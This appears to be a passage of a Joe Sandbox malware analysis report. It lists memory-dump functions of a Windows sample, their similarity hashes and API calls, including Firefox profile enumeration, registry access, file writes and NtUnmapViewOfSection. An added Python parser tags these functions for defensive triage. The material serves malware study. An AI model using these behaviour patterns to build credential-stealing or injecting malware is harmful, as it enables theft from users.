  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
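The function entries above are machine output: each block records a memory-dump source, a Similarity record (match count, API ID, String ID, Opcode ID and fuzzy hashes) and the API calls the function makes, with "Part of subcall function" lines inherited from callees. Triage of a few hundred such entries is easier with a parser that turns them into records and tags each function by capability, for example file writes, Firefox profile lookup, registry access or NtUnmapViewOfSection. The example below is added here and is not Joe Sandbox code; the tag rules, the hive/access/disposition decoders and the two-function SAMPLE excerpt (constructed from entries on this page, with the Source File lines dropped) are this example's own. The API ID field is kept verbatim because the report concatenates names without a separator, so tags are derived from the APIs list instead.

```python
"""Parse the per-function 'Memory Dump Source / Similarity / APIs' entries of a Joe Sandbox
report and tag each function by capability.  Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = r"""Memory Dump Source
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?), ref: 01B34B54
Memory Dump Source
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
APIs
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
"""

# One call line; the 'Part of subcall function X:' prefix marks a call made inside a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None

@dataclass
class FunctionEntry:
    total_matches: int = 0
    api_id: str = ""  # kept verbatim: the report concatenates the names, so it cannot be split
    string_id: str = ""
    opcode_id: str = ""
    apis: List[ApiCall] = field(default_factory=list)

def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'Memory Dump Source' block."""
    entries, section = [], None
    for line in text.splitlines():
        head = line.strip()
        if head == "Memory Dump Source":
            entries.append(FunctionEntry())
            section = head
        elif head in ("Similarity", "APIs", "Strings"):
            section = head
        elif entries and section == "APIs" and (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            entries[-1].apis.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif entries and section == "Similarity":
            key, _, val = head.lstrip("•").strip().partition(":")
            if key == "Total matches":
                entries[-1].total_matches = int(val)
            elif key in ("API ID", "String ID", "Opcode ID"):
                setattr(entries[-1], key.lower().replace(" ", "_"), val.strip())
    return entries

# Triage rules: this example's own mapping from API names and String ID to capability tags.
TAG_RULES = [
    ("file-write", {"WriteFile", "SetEndOfFile", "FlushFileBuffers"}),
    ("file-enumeration", {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW"}),
    ("registry", {"RegOpenKeyA", "RegOpenKeyW", "RegOpenKeyExA", "RegOpenKeyExW"}),
    ("section-unmap", {"NtUnmapViewOfSection"}),  # a step seen in process-hollowing loaders
]
FIREFOX_PROFILE = re.compile(r"Mozilla\\Firefox\\Profiles", re.I)
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}
ACCESS = {"80000000": "GENERIC_READ", "40000000": "GENERIC_WRITE", "C0000000": "GENERIC_READ|GENERIC_WRITE"}
DISPOSITION = {"1": "CREATE_NEW", "2": "CREATE_ALWAYS", "3": "OPEN_EXISTING", "4": "OPEN_ALWAYS", "5": "TRUNCATE_EXISTING"}

def tag_entry(entry: FunctionEntry, include_subcalls: bool = True) -> List[str]:
    names = {c.name for c in entry.apis if include_subcalls or c.subcall_of is None}
    tags = {tag for tag, apis in TAG_RULES if names & apis}
    if FIREFOX_PROFILE.search(entry.string_id):
        tags.add("browser-profile-path")
    return sorted(tags)

def decode_call(call: ApiCall) -> str:
    """Render the report's hex arguments as the Win32 constants that matter in triage."""
    a = call.args
    if call.name.startswith("RegOpenKey") and a:
        return f"{call.name}({HIVES.get(a[0], a[0])}, ...)"
    if call.name.startswith("CreateFile") and len(a) >= 5:
        disp = DISPOSITION.get(a[4].lstrip("0") or "0", a[4])
        return f"{call.name}(access={ACCESS.get(a[1], a[1])}, disposition={disp})"
    return f"{call.name}.{call.module}"

def triage(text: str) -> List[dict]:
    return [{"opcode": e.opcode_id[:12], "matches": e.total_matches, "tags": tag_entry(e),
             "calls": [decode_call(c) for c in e.apis if c.subcall_of is None]} for e in parse_entries(text)]
```

Run `triage(report_text)` over the whole function listing to get one row per function. Two choices worth noting: `include_subcalls=False` restricts tagging to a function's own calls, which matters because the inherited "Part of subcall function" lines (the 001D7471 temp-file helper appears under several functions on this page) otherwise smear one callee's behaviour across every caller; and the Opcode ID is the stable handle for deduplicating a function that is listed under more than one memory dump. The tags are indicators for prioritising manual review, not verdicts.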
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 4
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID: W
  • API String ID: 168078221-655174618
  • Opcode ID: b9da9fa840bf6074c408ec4bac05ea25fd3e186289c4e2afa14c93c02e877af3
  • Instruction ID: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
  • Opcode Fuzzy Hash: 70F049740108C689C00738799034776A140BFB12E5C8D7B31EA1A7968E7F62759A6B19
  • Instruction Fuzzy Hash: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
APIs
  • lstrlen.KERNEL32(00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000,00000000,00000001,?,?,001CD506,00000000), ref: 001C2752
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001C2765
  • lstrcpy.KERNEL32(00000004,00000000), ref: 001C2783
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,001EC202), ref: 001C27A9
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
